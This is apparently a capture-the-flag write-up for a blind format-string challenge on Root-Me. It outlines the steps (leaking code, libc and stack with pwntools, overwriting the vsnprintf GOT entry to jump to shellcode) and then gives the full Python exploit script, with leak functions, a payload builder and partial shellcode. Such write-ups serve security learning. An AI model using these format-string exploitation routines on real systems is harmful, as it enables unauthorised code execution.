Unblind me !

Blind Format string

After a very very long time finally got my exploit working ... This problem was pretty difficult , learned a lot though

There was no binary given a pure blind attack . So after reading few writeup got to know about Dynelf in pwntools which could help in dumping code,got_table,libc

1) dump the code ( didn't understand anything ) by guessing the start addr which is constant 0x8048000

2) dump the libc and got match it and reslove the function

3) tried got overwrite (this should have been last step if there was printf) but no function in which i could control 1'st argument :(

4) now dump the stack to find where passwd is stored (by dumping all values starting from 0xbfff000)

5) place the shellcode there and overwrite vsnprintf got addr with addr of shellcode

finally got the shell

from pwn import * from frmstr import * import binascii import sys def leak(s,offset,pad,address): data = "%"+str(offset)+"$pBBBB" + pack(address,'all') if "\n" in data: print " [!] newline in payload!" return "" try: s.sendline("%"+str(offset)+"$s"+"A"*pad + pack(address,'all')) except EOFError: raise EOFError try: data = s.recv() print "[R] leaked %d bytes at %x " % (len(data.split("A"*pad)[0]),address) except EOFError: print "[X] EOFError trying to leak from %x" % address return None (code,junk) = data.split("A"*pad) return code def leak_code(s,l_offset,l_pad,address,size): global offset global pad dump=open('test','w') offset = l_offset pad = l_pad remainingSize = size while remainingSize > 0: try: data = leak(s,offset,pad,address + size - remainingSize) remainingSize -= 1 except EOFError: return out if len(data) == 0: dump.write("[+]"+hex(address + size - remainingSize)+" : "+data+"\n") else: context.bits = len(data)*8 data = hex(unpack(data)) print "[+]"+hex(address + size - remainingSize)+" : "+data+"\n" dump.write("[+]"+hex(address + size - remainingSize)+" : "+data+"\n") remainingSize -= len(data) + 1 def leakstack(r,start,end,writes): dump=open('stack_val','w') for i in range(start,end): try : payload="%"+str(i)+"$"+writes r.sendline(payload) msg=r.recvline() print "[+] trying with index"+str(i)+" "+msg dump.write(str(i)+" : "+msg+"\n") except EOFError : print "[+] no luck here !!" i=i+1 def send_rev_payload(r,dest,data,offset): data_off_l = data & 0xFFFF data_off_u = (data >> 16) & 0xFFFF num1 = data_off_u - 8 num2 = data_off_l - data_off_u print "[+] Data_high = %x , Data_low = %x " %(data_off_u, data_off_l) payload = pack(dest)+pack(dest+2)+"%"+str(num1)+"u"+"%"+str(offset+1)+"$hn"+"%"+str(num2)+"u"+"%"+str(offset)+"$hn" print "[+] payload = "+repr(payload) r.sendline(payload) offset = 0 pad = 0 base_addr = 0x8048000 r=remote('challenge02.root-me.org',56003) saveSocket = r shellcode = "\x6a\x02\x5b\x6a\x29\x58\xcd........" msg=r.recvuntil(':') print msg r.sendline('root') msg=r.recvuntil(':') print msg r.sendline(shellcode) msg=r.recvline() print msg vsnprintf_got = 0x804a020 shellcode_addr = 0xbffff92c #leakstack(r,500,700,'p') #leak_code(r,263,2,0xbffff92c,32) send_rev_payload(r,vsnprintf_got,shellcode_addr,261) r.sendline('JUNK') r.interactive()